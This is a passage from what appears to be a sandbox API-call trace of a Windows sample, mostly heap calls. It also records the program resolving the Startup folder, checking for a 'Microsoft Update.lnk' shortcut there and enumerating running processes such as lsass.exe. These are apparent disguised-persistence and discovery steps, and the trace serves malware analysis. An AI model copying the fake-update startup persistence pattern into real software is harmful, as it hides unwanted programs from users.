hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0319.692] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0319.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0319.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0319.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0319.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0319.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0319.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0319.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0319.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.693] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0319.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0319.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0319.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0319.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0319.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0319.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0319.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0319.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0319.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0319.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0319.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0319.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0319.813] FreeLibrary (hLibModule=0x74f40000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0319.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0319.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0319.814] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0319.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0319.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0319.814] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0319.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0319.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0319.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0319.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0319.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0319.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0319.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0319.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0319.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0319.817] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0319.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0319.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0319.818] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0319.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0319.818] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0319.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0319.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0319.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0319.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0319.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0319.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0319.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0319.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0319.819] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0319.820] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0319.820] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0319.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0319.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0319.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0319.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0319.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0319.822] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0319.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0319.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0319.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0319.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0319.829] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 